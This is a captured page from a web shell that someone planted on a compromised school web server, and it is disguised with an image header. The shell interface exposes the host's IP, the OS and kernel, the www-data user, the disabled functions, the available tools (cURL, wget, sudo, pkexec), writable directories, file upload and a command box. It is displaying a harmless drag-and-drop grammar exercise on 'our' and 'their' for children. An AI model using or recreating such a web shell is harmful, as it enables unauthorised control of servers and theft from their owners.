????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.135.224.139
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old7/Html/LevelE/Category1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old7/Html/LevelE/Category1/LevelECat1Lesson10.html
<!doctype html>
<html>
    <head>
        <title>Fill in the blanks with 'our' or 'their'</title>
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
        <script>
            
            function page_preLoad()
            {                
                shared_setDeviceTypeLevelCategoryLastLesson(Level.E, Category.No1);
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.E, Category.No1, 10), true, true);
                shared_setFooterTable('id_tblFooter', true, true, false, true, true);
                
                var ids_headings = ['id_td_heading1', 'id_td_heading2'];
                var ids_options = ['id_td_textOur1', 'id_td_textOur2', 'id_td_textOur3', 'id_td_textOur4', 'id_td_textOur5', 'id_td_textOur6', 'id_td_textTheir1', 'id_td_textTheir2', 'id_td_textTheir3', 'id_td_textTheir4', 'id_td_textTheir5', 'id_td_textTheir6'];
                var ids_spans = ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6', 'id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'];
                
                var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3', 'id_td_text4', 'id_td_text5', 'id_td_text6', 'id_td_text7', 'id_td_text8', 'id_td_text9', 'id_td_text10', 'id_td_text11', 'id_td_text12', 'id_td_text13', 'id_td_text14', 'id_td_text15', 'id_td_text16', 'id_td_text17', 'id_td_text18', 'id_td_text19', 'id_td_text20', 'id_td_text22', 'id_td_text23', 'id_td_text24', 'id_td_text25', 'id_td_text26', 'id_td_text27', 'id_td_text28', 'id_td_text29', 'id_td_text30', 'id_td_text31', 'id_td_text32', 'id_td_text33', 'id_td_text34', 'id_td_text35', 'id_td_text36'];
                
                var ids_boxes = ['id_dropbox_our1', 'id_dropbox_our2', 'id_dropbox_our3', 'id_dropbox_our4', 'id_dropbox_our5', 'id_dropbox_our6', 'id_dropbox_their1', 'id_dropbox_their2', 'id_dropbox_their3', 'id_dropbox_their4', 'id_dropbox_their5', 'id_dropbox_their6'];
                
                var ids_All = ids_headings.concat(ids_options, ids_texts, ids_boxes);
                
                shared_adjust_fontSize_for_ids_all_devices(ids_All, 70);
                
                shared_hideAllExceptFirstElement('id_span_textOur', 6);
                shared_set_all_draggble_to_false_except_first_element('id_td_textOur', 6);
                
                shared_hideAllExceptFirstElement('id_span_textTheir', 6);
                shared_set_all_draggble_to_false_except_first_element('id_td_textTheir', 6);
                
                shared_init_dropBox_tds_withOUT_drag_here(ids_boxes);
                shared_init_dropping_spans(ids_spans);
                
                var id_tables_array = ['id_table1'];
                shared_border_collapse_for_tables_for_all(id_tables_array);
            }
        
            function page_onLoad()
            {

            }
        
            function btnHome_click()
            {
                shared_btnHomeCategories_click('LevelE');
            }
        
            function btnPrevious_click()
            {
                window.location = 'LevelECat1Lesson09.html';
            }
            
            function btnNext_click()
            {
                window.location = 'LevelECat1Lesson11.html';
            }

            function DragDrop(id_dropBox, text, ids_array)
            {
                if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                {
                    shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox);
                    
                    if (text == 'our')
                    {
                        shared_unHideNextElementNew2('id_span_textOur', 'id_td_textOur', 6);
                    }
                    else if (text == 'their')
                    {
                        shared_unHideNextElementNew2('id_span_textTheir', 'id_td_textTheir', 6);
                    }
                    
                    isAllInfosMovedShowClapsAnimation();
                    
                    shared_set_currentDropingId_draggbleToFalse();
                }
                else
                {
                    shared_resetCurrentDroppingPosition(id_dropBox);
                }
            }
                    
            function isAllInfosMovedShowClapsAnimation()
            {
                var ids_boxes = ['id_dropbox_our1', 'id_dropbox_our2', 'id_dropbox_our3', 'id_dropbox_our4', 'id_dropbox_our5', 'id_dropbox_our6', 'id_dropbox_their1', 'id_dropbox_their2', 'id_dropbox_their3', 'id_dropbox_their4', 'id_dropbox_their5', 'id_dropbox_their6'];
                
                shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
            }
        </script>

    </head>
    <body onload="page_onLoad()">
        
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0">
                                    <tr>
                                        <td>
                                            <table id="id_table1" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
                                                <tr height="10%">
                                                    <td id="id_td_heading1" class="shared_style_black_24px_bold_padding_left_2_percent">Clues: <span style="color:red">we-us-our &nbsp;&nbsp;&nbsp; they-them- their</span><br><br>Fill n the blanks with <span style="color:red">"our" &nbsp; or &nbsp; "their"</span>
                                                    
                                                    </td>
                                                </tr>
                                                <tr height="10%">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr height="60%">
                                                                <td id="id_td_heading2" width="*" class="shared_style_blue_24px_bold_padding_left_2_percent">Options:</td>
                                                                <td id="id_td_textOur1" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textOur1">our</span>
                                                                </td>
                                                                <td id="id_td_textOur2" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textOur2">our</span>
                                                                </td>
                                                                <td id="id_td_textOur3" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textOur3">our</span>
                                                                </td>
                                                                <td id="id_td_textOur4" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textOur4">our</span>
                                                                </td>
                                                                <td id="id_td_textOur5" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textOur5">our</span>
                                                                </td>
                                                                <td id="id_td_textOur6" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textOur6">our</span>
                                                                </td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td width="*">&nbsp;</td>
                                                                <td id="id_td_textTheir1" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textTheir1">their</span>
                                                                </td>
                                                                <td id="id_td_textTheir2" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textTheir2">their</span>
                                                                </td>
                                                                <td id="id_td_textTheir3" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textTheir3">their</span>
                                                                </td>
                                                                <td id="id_td_textTheir4" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textTheir4">their</span>
                                                                </td>
                                                                <td id="id_td_textTheir5" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textTheir5">their</span>
                                                                </td>
                                                                <td id="id_td_textTheir6" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                    <span id="id_span_textTheir6">their</span>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td style="padding-bottom:0px">
                                                        <table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0">
                                                            <tr id="id_tr_dropbox_our1" height="8%"
                                                                ondragover="shared_highlight('id_dropbox_our1'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_our1')"
                                                                ondrop="DragDrop('id_dropbox_our1', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text1" class="shared_style_black_24px_bold" width="10%" align="right">1.</td>
                                                                            <td id="id_td_text2" class="shared_style_black_24px_bold" width="48%" align="left">&nbsp;This bottle belongs to us. It is</td>
                                                                            <td id="id_dropbox_our1" class="shared_style_red_24px_bold" width="12%" align="center">_____</td>
                                                                            <td id="id_td_text3" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;bottle.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_their1" height="8%"
                                                                ondragover="shared_highlight('id_dropbox_their1'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_their1')"
                                                                ondrop="DragDrop('id_dropbox_their1', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text4" class="shared_style_black_24px_bold" width="10%" align="right">2.</td>
                                                                            <td id="id_td_text5" class="shared_style_black_24px_bold" width="52%" align="left">&nbsp;This bench belongs to them. It is</td>
                                                                            <td id="id_dropbox_their1" class="shared_style_red_24px_bold" width="15%" align="center">_____</td>
                                                                            <td id="id_td_text6" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;bench.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_our2" height="8%"
                                                                ondragover="shared_highlight('id_dropbox_our2'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_our2')"
                                                                ondrop="DragDrop('id_dropbox_our2', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text7" class="shared_style_black_24px_bold" width="10%" align="right">3.</td>
                                                                            <td id="id_td_text8" class="shared_style_black_24px_bold" width="50%" align="left">&nbsp;We have three cars. They are</td>
                                                                            <td id="id_dropbox_our2" class="shared_style_red_24px_bold" width="12%" align="center">_____</td>
                                                                            <td id="id_td_text9" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;cars.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_their2" height="8%"
                                                                ondragover="shared_highlight('id_dropbox_their2'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_their2')"
                                                                ondrop="DragDrop('id_dropbox_their2', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text10" class="shared_style_black_24px_bold" width="10%" align="right">4.</td>
                                                                            <td id="id_td_text11" class="shared_style_black_24px_bold" width="52%" align="left">&nbsp;They have four trucks. They are</td>
                                                                            <td id="id_dropbox_their2" class="shared_style_red_24px_bold" width="12%" align="center">_____</td>
                                                                            <td id="id_td_text12" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;trucks.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_our3" height="8%"
                                                                ondragover="shared_highlight('id_dropbox_our3'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_our3')"
                                                                ondrop="DragDrop('id_dropbox_our3', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text13" class="shared_style_black_24px_bold" width="10%" align="right">5.</td>
                                                                            <td id="id_td_text14" class="shared_style_black_24px_bold" width="38%" align="left">&nbsp;My brother and I brush</td>
                                                                            <td id="id_dropbox_our3" class="shared_style_red_24px_bold" width="12%" align="center">_____</td>
                                                                            <td id="id_td_text15" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;teeth every day.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_their3" height="8%"
                                                                ondragover="shared_highlight('id_dropbox_their3'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_their3')"
                                                                ondrop="DragDrop('id_dropbox_their3', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text16" class="shared_style_black_24px_bold" width="10%" align="right">6.</td>
                                                                            <td id="id_td_text17" class="shared_style_black_24px_bold" width="45%" align="left">&nbsp;Teja and Krishna are doing</td>
                                                                            <td id="id_dropbox_their3" class="shared_style_red_24px_bold" width="12%" align="center">_____</td>
                                                                            <td id="id_td_text18" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;homework.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_our4" height="8%"
                                                                ondragover="shared_highlight('id_dropbox_our4'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_our4')"
                                                                ondrop="DragDrop('id_dropbox_our4', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text19" class="shared_style_black_24px_bold" width="10%" align="right">7.</td>
                                                                            <td id="id_dropbox_our4" class="shared_style_red_24px_bold" width="12%" align="center">_____</td>
                                                                            <td id="id_td_text20" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;school is in Begumpet.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_their4" height="9%"
                                                                ondragover="shared_highlight('id_dropbox_their4'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_their4')"
                                                                ondrop="DragDrop('id_dropbox_their4', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text22" class="shared_style_black_24px_bold" width="10%" align="right">8.</td>
                                                                            <td id="id_td_text23" class="shared_style_black_24px_bold" width="38%" align="left">&nbsp;Rahul and Vishnu love</td>
                                                                            <td id="id_dropbox_their4" class="shared_style_red_24px_bold" width="12%" align="center">_____</td>
                                                                            <td id="id_td_text24" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;dog.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_their5" height="9%"
                                                                ondragover="shared_highlight('id_dropbox_their5'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_their5')"
                                                                ondrop="DragDrop('id_dropbox_their5', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text25" class="shared_style_black_24px_bold" width="10%" align="right">9.</td>
                                                                            <td id="id_td_text26" class="shared_style_black_24px_bold" width="45%" align="left">&nbsp;Tarun and Rishab play near</td>
                                                                            <td id="id_dropbox_their5" class="shared_style_red_24px_bold" width="12%" align="center">_____</td>
                                                                            <td id="id_td_text27" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;houses.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_our5" height="9%"
                                                                ondragover="shared_highlight('id_dropbox_our5'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_our5')"
                                                                ondrop="DragDrop('id_dropbox_our5', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text28" class="shared_style_black_24px_bold" width="10%" align="right">10.</td>
                                                                            <td id="id_td_text29" class="shared_style_black_24px_bold" width="30%" align="left">&nbsp;We must listen to</td>
                                                                            <td id="id_dropbox_our5" class="shared_style_red_24px_bold" width="12%" align="center">_____</td>
                                                                            <td id="id_td_text30" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;parents and teachers.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_their6" height="9%"
                                                                ondragover="shared_highlight('id_dropbox_their6'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_their6')"
                                                                ondrop="DragDrop('id_dropbox_their6', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text31" class="shared_style_black_24px_bold" width="10%" align="right">11.</td>
                                                                            <td id="id_td_text32" class="shared_style_black_24px_bold" width="50%" align="left">&nbsp;They live in this house. This is</td>
                                                                            <td id="id_dropbox_their6" class="shared_style_red_24px_bold" width="12%" align="center">_____</td>
                                                                            <td id="id_td_text33" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;house.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_our6" height="*"
                                                                ondragover="shared_highlight('id_dropbox_our6'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_our6')"
                                                                ondrop="DragDrop('id_dropbox_our6', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="8%">
                                                                            <td id="id_td_text34" class="shared_style_black_24px_bold" width="10%" align="right">12.</td>
                                                                            <td id="id_td_text35" class="shared_style_black_24px_bold" width="45%" align="left">&nbsp;We are going to cinema in</td>
                                                                            <td id="id_dropbox_our6" class="shared_style_red_24px_bold" width="12%" align="center">_____</td>
                                                                            <td id="id_td_text36" class="shared_style_black_24px_bold" width="*" align="left">&nbsp;car.</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        <script>
            page_preLoad();
            
            new webkit_draggable('id_span_textOur1', {handle : 'id_td_textOur1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textOur2', {handle : 'id_td_textOur2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textOur3', {handle : 'id_td_textOur3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textOur4', {handle : 'id_td_textOur4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textOur5', {handle : 'id_td_textOur5', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textOur6', {handle : 'id_td_textOur6', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textTheir1', {handle : 'id_td_textTheir1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textTheir2', {handle : 'id_td_textTheir2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textTheir3', {handle : 'id_td_textTheir3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textTheir4', {handle : 'id_td_textTheir4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textTheir5', {handle : 'id_td_textTheir5', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textTheir6', {handle : 'id_td_textTheir6', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            
            webkit_drop.add('id_tr_dropbox_our1', {onOver : function(){shared_highlight('id_dropbox_our1')}, onOut : function(){shared_un_highlight('id_dropbox_our1')}, onDrop : function(){DragDrop('id_dropbox_our1', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])}});
            webkit_drop.add('id_tr_dropbox_our2', {onOver : function(){shared_highlight('id_dropbox_our2')}, onOut : function(){shared_un_highlight('id_dropbox_our2')}, onDrop : function(){DragDrop('id_dropbox_our2', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])}});
            webkit_drop.add('id_tr_dropbox_our3', {onOver : function(){shared_highlight('id_dropbox_our3')}, onOut : function(){shared_un_highlight('id_dropbox_our3')}, onDrop : function(){DragDrop('id_dropbox_our3', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])}});
            webkit_drop.add('id_tr_dropbox_our4', {onOver : function(){shared_highlight('id_dropbox_our4')}, onOut : function(){shared_un_highlight('id_dropbox_our4')}, onDrop : function(){DragDrop('id_dropbox_our4', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])}});
            webkit_drop.add('id_tr_dropbox_our5', {onOver : function(){shared_highlight('id_dropbox_our5')}, onOut : function(){shared_un_highlight('id_dropbox_our5')}, onDrop : function(){DragDrop('id_dropbox_our5', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])}});
            webkit_drop.add('id_tr_dropbox_our6', {onOver : function(){shared_highlight('id_dropbox_our6')}, onOut : function(){shared_un_highlight('id_dropbox_our6')}, onDrop : function(){DragDrop('id_dropbox_our6', 'our', ['id_span_textOur1', 'id_span_textOur2', 'id_span_textOur3', 'id_span_textOur4', 'id_span_textOur5', 'id_span_textOur6'])}});
            
            webkit_drop.add('id_tr_dropbox_their1', {onOver : function(){shared_highlight('id_dropbox_their1')}, onOut : function(){shared_un_highlight('id_dropbox_their1')}, onDrop : function(){DragDrop('id_dropbox_their1', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])}});
            webkit_drop.add('id_tr_dropbox_their2', {onOver : function(){shared_highlight('id_dropbox_their2')}, onOut : function(){shared_un_highlight('id_dropbox_their2')}, onDrop : function(){DragDrop('id_dropbox_their2', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])}});
            webkit_drop.add('id_tr_dropbox_their3', {onOver : function(){shared_highlight('id_dropbox_their3')}, onOut : function(){shared_un_highlight('id_dropbox_their3')}, onDrop : function(){DragDrop('id_dropbox_their3', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])}});
            webkit_drop.add('id_tr_dropbox_their4', {onOver : function(){shared_highlight('id_dropbox_their4')}, onOut : function(){shared_un_highlight('id_dropbox_their4')}, onDrop : function(){DragDrop('id_dropbox_their4', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])}});
            webkit_drop.add('id_tr_dropbox_their5', {onOver : function(){shared_highlight('id_dropbox_their5')}, onOut : function(){shared_un_highlight('id_dropbox_their5')}, onDrop : function(){DragDrop('id_dropbox_their5', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])}});
            webkit_drop.add('id_tr_dropbox_their6', {onOver : function(){shared_highlight('id_dropbox_their6')}, onOut : function(){shared_un_highlight('id_dropbox_their6')}, onDrop : function(){DragDrop('id_dropbox_their6', 'their', ['id_span_textTheir1', 'id_span_textTheir2', 'id_span_textTheir3', 'id_span_textTheir4', 'id_span_textTheir5', 'id_span_textTheir6'])}});
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit